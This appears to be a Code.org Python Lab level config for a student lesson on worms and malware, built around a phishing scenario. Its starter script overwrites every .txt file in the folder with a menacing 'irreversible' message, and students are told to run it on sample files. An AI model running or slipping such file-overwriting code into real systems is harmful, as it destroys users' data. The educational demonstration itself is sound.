<Pythonlab>
  <config><![CDATA[{
  "published": true,
  "game_id": 72,
  "created_at": "2025-07-17T18:24:41.000Z",
  "level_num": "custom",
  "user_id": 22366,
  "properties": {
    "start_sources": {
      "files": {
        "0": {
          "id": "0",
          "name": "main.py",
          "language": "py",
          "contents": "import os\nfrom datetime import datetime\n\npayload_text = f\"\"\"\n████████ SYSTEM EVENT: UNKNOWN WRITE ACCESS ████████\n\nThis file has been restructured.\nOriginal contents: removed.\nProcess: irreversible\n\nObserved activity flagged as \"high-interest\"\nTimestamp: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\nFile ID: #A1-R3M0T3-EXEC\n\nThis system is no longer under your control.\nAttempting to restore this file may result in further loss.\n\nThe process is already complete.\nStop looking.\n\"\"\"\n\ndef overwrite_txt_files():\n    files = [f for f in os.listdir() if f.endswith(\".txt\") and os.path.isfile(f)]\n\n    if not files:\n        print(\"No .txt files found in the current directory.\")\n        return\n\n    for file in files:\n        try:\n            with open(file, 'w') as f:\n                f.write(payload_text)\n            print(f\"[✓] Overwritten: {file}\")\n        except Exception as e:\n            print(f\"[!] Error overwriting {file}: {e}\")\n\nif __name__ == \"__main__\":\n    print(\"⛓️  Activating containment protocol...\")\n    overwrite_txt_files()\n    print(\"🕳️  Execution complete. Traces erased.\")\n\n",
          "folderId": "0",
          "active": true,
          "open": true,
          "type": "support"
        },
        "1": {
          "id": "1",
          "name": "grades.txt",
          "language": "txt",
          "contents": "Math: A-  \nScience: B+  \nEnglish: A  \nHistory: B  \nP.E.: A",
          "folderId": "0",
          "active": false,
          "open": true
        },
        "2": {
          "id": "2",
          "name": "experiment.txt",
          "language": "txt",
          "contents": "Title: Plant Growth Experiment\n\nPurpose: To find out if music affects how fast plants grow.\nHypothesis: Plants that listen to music will grow faster than those in silence.",
          "folderId": "0",
          "active": false,
          "open": true
        },
        "3": {
          "id": "3",
          "name": "essay.txt",
          "language": "txt",
          "contents": "How to Make Jollof Rice (Just Like My Auntie Does)\n\nOne of my favorite dishes in the world is Jollof rice.\nIt’s a popular West African meal that’s full of flavor, color, and spice. \nEvery country claims their version is the best, but in my opinion, nothing beats my auntie’s Nigerian-style Jollof.\n\nTo make it, you start with rice, tomatoes, onions, and red bell peppers. My auntie blends the tomatoes and peppers into a smooth mix, then cooks it with oil and spices like thyme, curry powder, and bouillon.\nIt smells amazing when it starts bubbling in the pot. Next, she adds the rice and stirs it into the red sauce. \nThe trick, she says, is to cover it with foil so the steam stays in and gives the rice that perfect texture — not too soft, not too hard. \nWhile it’s cooking, she might fry some plantains or grill chicken to go with it.\n\nJollof rice is more than just food. We eat it at birthdays, weddings, and family gatherings. Everyone brings their own twist. \nSome people add shrimp or vegetables, and others keep it classic. \nWhenever I smell Jollof cooking, it reminds me of dancing in the kitchen and laughing with my cousins.\n\nI like that this recipe brings people together. It’s not fancy, but it’s full of love. \n\nOne day, I hope I can make it just as well as my auntie does, but she says the secret ingredient is cooking with joy.",
          "folderId": "0",
          "active": false,
          "open": true
        }
      },
      "folders": {
      },
      "openFiles": [
        "0",
        "1",
        "2",
        "3"
      ]
    },
    "encrypted": "false",
    "long_instructions": "## **Scenario**\r\n\r\nWhile waiting for the school's club sign-up website to come back online, Haley checks her email. She notices a message from an address she doesn't recognize. The email claims there's an alternative sign-up link for clubs and encourages her to click it.\r\n\r\nWhen Haley clicks the link, something immediately downloads to her computer. Seconds later, she watches as all her local text files are overwritten. What can she do? Is there a way to undo this?\r\n\r\n---\r\n\r\n\r\n\r\n\r\n**Malware** is software designed to harm, disrupt, or gain unauthorized access to a system.\r\n\r\nA **worm** is a specific type of malware that spreads automatically from one device to another without needing to attach to a file. Once activated, a worm can replicate itself, move across networks, folders, or email systems, and damage or overwrite files.\r\n\r\n\r\n<br/><br/>\r\n\r\n**Step 1: Look Around**\r\n\r\nOpen and read the following files:\r\n\r\n* `my_essay.txt`\r\n* `science_project.txt`\r\n* `grades.txt`\r\n\r\n<br/><br/>\r\n\r\n**Step 2: Run the Worm**\r\n\r\nClick on the \"Run\" button to see what happens.\r\n<br/><br/>\r\n\r\n**Step 3: Check the Damage**\r\n\r\nLook at for any changes in the `.txt` files and console.\r\n\r\n<br/><br/>",
    "ai_tutor_available": "false",
    "submittable": "false",
    "hide_share_and_remix": "false",
    "enable_micro_bit": "false",
    "widget_view": "false",
    "widget_view_allow_show_code": "false",
    "predict_settings": {
      "isPredictLevel": false
    },
    "display_name": "Worms",
    "offer_browser_tts": "false",
    "disable_edit_run_for_submission": "false"
  },
  "audit_log": "[{\"changed_at\":\"2025-07-18 13:28:49 +0000\",\"changed\":[],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-07-18 13:28:50 +0000\",\"changed\":[],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-07-18 14:34:53 +0000\",\"changed\":[],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-07-18 14:37:45 +0000\",\"changed\":[\"long_instructions\",\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-07-18 14:42:08 +0000\",\"changed\":[\"long_instructions\",\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-07-18 14:44:45 +0000\",\"changed\":[\"long_instructions\",\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-07-18 14:49:09 +0000\",\"changed\":[\"long_instructions\",\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-07-18 14:50:02 +0000\",\"changed\":[\"long_instructions\",\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-07-18 14:50:45 +0000\",\"changed\":[\"long_instructions\",\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-07-18 14:53:10 +0000\",\"changed\":[\"long_instructions\",\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-07-18 14:56:52 +0000\",\"changed\":[\"long_instructions\",\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-07-18 14:59:40 +0000\",\"changed\":[\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-08-13 19:37:17 +0000\",\"changed\":[\"predict_settings\"],\"changed_by_id\":18762,\"changed_by_email\":\"emma.wingreen+levelbuilder@code.org\"},{\"changed_at\":\"2025-08-14 00:02:08 +0000\",\"changed\":[\"start_sources\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-08-14 01:25:38 +0000\",\"changed\":[\"long_instructions\",\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-08-14 01:27:16 +0000\",\"changed\":[\"long_instructions\",\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-08-14 01:28:35 +0000\",\"changed\":[\"long_instructions\",\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-08-14 01:29:29 +0000\",\"changed\":[\"long_instructions\",\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-08-14 16:25:16 +0000\",\"changed\":[\"long_instructions\",\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"},{\"changed_at\":\"2025-08-14 16:27:09 +0000\",\"changed\":[\"long_instructions\",\"predict_settings\"],\"changed_by_id\":22366,\"changed_by_email\":\"joi.anderson@code.org\"}]"
}]]></config>
</Pythonlab>
